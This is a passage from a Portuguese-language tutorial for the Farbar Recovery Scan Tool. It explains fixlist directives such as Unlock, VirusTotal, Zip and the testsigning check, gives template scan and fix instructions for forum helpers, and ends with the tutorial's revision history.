Nota: A linha de confirmação aparece independentemente de qualquer eventual erro no seu arquivo .reg.

Nota: As diretivas não lidam com chaves/valores bloqueadas ou inválidas. Consulte a seção DeleteKey: e DeleteValue: acima neste tutorial.
 

Symlink:
 
Para listar links simbólicos ou junções em uma pasta.

 

A sintaxe é:

Citação

Symlink: caminho

 

Exemplo:

Citação

Symlink: C:\Windows

 

Nota: A diretiva funciona recursivamente. Portanto, a verificação pode levar um tempo significativo dependendo do local.

 

 
SystemRestore:

Para ativar ou desativar o Sistema de Restauração.

A sintaxe é:

SystemRestore: On

 

SystemRestore: Off

Quando é pela primeira vez utilizada a sintaxe "On", FRST verifica se existe espaço livre suficiente para ativar o Sistema de Restauração. Se esse requisito não for possível, será listado um erro.
 
 
TasksDetails:

Lista detalhes de tarefas adicionais, relacionadas com o tempo de execução.

Exemplo:

========================= TasksDetails: ======================== 

UCBrowserUpdater (LastRunTime: NA -> NextRunTime: 2016-10-13 11:32:00 -> Status: Ready -> Schedule Type: Undefined)

Nota: Esta diretiva não é compatível com o Windows XP e apenas funciona no Modo Normal.

 
testsigning on:

Nota: Para Windows Vista e versões posteriores, não é compatível com dispositivos com Modo Seguro ativado.

A ativação testsigning é uma modificação BCD não padrão, que poderia ser introduzida pelo malware ou usuários que tentam instalar controladores (drivers) não compatíveis. Quanto FRST localiza evidências deste tipo, irá reportar da seguinte maneira:

 

testsigning: ==> 'o 'modo de teste' está configurado. Verificação por possível controlador não assinado <===== ATENÇÃO

Inspecione a seção Drivers/Controladores em busca do controlador que coincida com o alerta. Dependendo da situação, inclua o controlador (driver) juntamente com o alerta, ou apenas o alerta no fixlist.

No caso de encontrar efeitos colaterais depois de processar as entradas, utilize a diretiva para voltar a ativar testsigning para a solução de problemas.

Unlock:

Esta diretiva, no caso de arquivos/diretorios, estabelece o grupo "Administradores" como proprietário e concede acesso a "Usuários"  e "Sistema". Deverá ser utilizada para arquivos/diretorios maliciosos. Para desbloquear arquivos do sistema, utilize a diretiva SetDefaultFilePermissions:.

No caso de chaves do Registro, estabelece o grupo "Administradores" como proprietário e concede aos grupos o acesso habitual, funcionando apenas sobre a chave aplicada. Pode ser utilizado tanto em chaves maliciosas como em chaves legítimas.

O script será:

Unlock: caminho

Nota: Para remover um item não é necessário desbloqueá-lo antes de removê-lo.

• Para arquivos/pastas, basta incluir na fixlist o caminho e FRST irá fazer um reset as permissões e mover os objetos para a Quarantine. Para remover de forma permanente uma pasta, utilize a diretiva RemoveDirectory:
• Para as chaves de registro, utilize a diretiva DeleteKey: 

 
VirusTotal:

Para verificar arquivos com o VirusTotal. FRST pesquisará previamente na base de dados do VirusTotal. Um arquivo que nunca tenha sido submetido para o VirusTotal será enviado (upload) para analise.
 
Podem ser incluídos vários arquivos, separados por ponto e vírgula.

VirusTotal: caminho;caminho

Nota: Para mais de 4 arquivos, utilize apenas uma diretiva com o ponto e vírgula como limitador, em vez de várias diretivas, para garantir que todos links disponíveis do VirusTotal serão mostrados.

Exemplo:

VirusTotal: C:\Windows\TEMP\gAEB5.tmp.exe;C:\Windows\system32\Drivers\vsotavco.sys

 

VirusTotal: C:\Windows\TEMP\gAEB5.tmp.exe => https://www.virustotal.com/file/b529ca4dd148fdfcee0c1f267bc6821cc5168c121363fa690536a72e0f447c19/analysis/1500276443/ 
VirusTotal: C:\Windows\system32\Drivers\vsotavco.sys => D41D8CD98F00B204E9800998ECF8427EC (0-byte MD5)

“0-byte MD5” indica que um arquivo está em utilização, bloqueado, vazio ou o caminho é referente a uma ligação simbólica.


Zip:

Para incluir arquivos/pastas zipadas (comprimidas) em um arquivo chamado de Data_Hora.zip para ser criado no ambiente de trabalho (desktop) do usuário, para posteriormente o usuário manualmente poder fazer o upload. Em caso de arquivos/pastas com o mesmo nome, serão criados vários arquivos.
 
Podem ser incluídos quantos arquivos/pastas queira, desde que sejam separados por ponto e vírgula.

Zip: caminho;caminho

Exemplo:

Zip: C:\malware.exe;C:\Windows\Minidump;C:\Windows\Logs\CBS\CBS.log

 

 

[Lusitano]

Instruções pré-elaboradas 

 

Análise

Exemplo de instruções para a ferramenta FRST ser executada em modo normal:
 

Faça o download de Farbar Recovery Scan Tool e salve no seu Desktop (Ambiente de Trabalho).

 

Nota: Deverá ser executada a versão compatível com o seu sistema. Se não tem a certeza de qual a versão se adequa ao seu sistema, faça o download de ambas e tente executá-las. Apenas conseguirá executar uma delas, que será a versão correta e compatível com o seu sistema.

• Clique direito e executar como administrador. Quando a ferramenta abrir, clique em Sim para aceitar o aviso legal.
• Pressione o botão Analisar.
• Serão gerados resultados (logs) com o nome de FRST.txt e Addition.txt, que estarão localizados na mesma diretoria de onde a ferramenta foi executada.
• Por favor copie e cole (ou anexe) esses logs na sua próxima resposta ao tópico.

 

 

Correções (fix)

Exemplo de instruções para uma correção realizada no modo normal ou seguro, ou seja, dentro do Windows:

 

Faça o download do arquivo fixlist.txt em anexo e salve-o no seu Ambiente de Trabalho (Desktop).

NOTA: É importante que ambos os arquivos, FRST/FRST64 e fixlist.txt estejam na mesma localização, ou a correção (fix) não irá funcionar.

 

ATENÇÃO: Este script foi criado especificamente para este usuário e para este computador. Executar este script em outro computador, pode danificar o seu sistema operativo!

• Execute FRST/FRST64 e pressione o botão Corrigir apenas uma vez e aguarde. Se por qualquer razão a ferramenta necessitar de reiniciar, certifique-se que deixa que o seu sistema seja reiniciado normalmente.
• Depois, aguarde que a ferramenta conclua e finalize a sua execução.
• Quanto estiver concluído, a ferramenta FRST irá gerar um arquivo no Desktop (Fixlog.txt). Por gentileza, coloque (anexe) esse log na sua próxima resposta.

 

 

Exemplo de instruções para uma correção realizada em Modo de Recuperação:
 

Abra o Bloco de Notas (Notepad). Copie e cole todo o contéudo da caixa "Citação" abaixo.

Para fazer isto, selecione todo o conteúdo da caixa, clique direito do mouse e selecione copiar. Cole agora para dentro do bloco de notas. Salve esse arquivo com o nome fixlist.txt em uma unidade flash (ex: pendrive).

Citação

conteúdo do script

ATENÇÃO: Este script foi criado especificamente para este usuário e para este computador. Executar este script em outro computador, pode danificar o seu sistema operativo!

Agora, entre no prompt de comando Ambiente Recuperação do Sistema.

Execute FRST/FRST64 e pressione o botão Corrigir apenas uma vez e aguarde.

A ferramenta irá gerar um log (Fixlog.txt) na unidade flash (ex: pendrive), o qual deve ser enviado na sua próxima resposta.

 

 

[Lusitano]

Revisões/Atualizações do Tutorial:

 

12/11/2021 Adicionada tradução em Português
12/11/2021 Adicionado as operações de sistema suportadas em Windows 11
12/11/2021 Adicionada análise BITS em Outras Áreas

09/02/2022 Adicionado o comando Comment:

23/03/2022 Limite de tempo para correção, somente para esta diretiva cmd:

10/04/2022 Atualização da descrição de "Processos", para incluir a explicação de (processo parental ->)

30/06/2022 Modelo de disco para unidades fixas adicionado

30/06/2022 Adicionada diretiva EmptyEventLogs:

30/06/2022 EmptyTemp: Atualizado (cache do Flash removido, cache do Discord adicionado)

30/06/2022 FilesInDirectory: e Folder: atualizado para incluir a verificação de assinaturas digitais

30/06/2022 Remoção de exemplos desnecessários

10/10/2022 EmptyTemp: Atualizado (cache do WinHTTP AutoProxy adicionado)

26/12/2023 Adicionado o redirecionamento das pastas Startup no setor Registro

26/12/2023 Unlock: Descrição corrigida e encurtada

26/12/2023 Nota relacionada ao caminho corrompido atualizada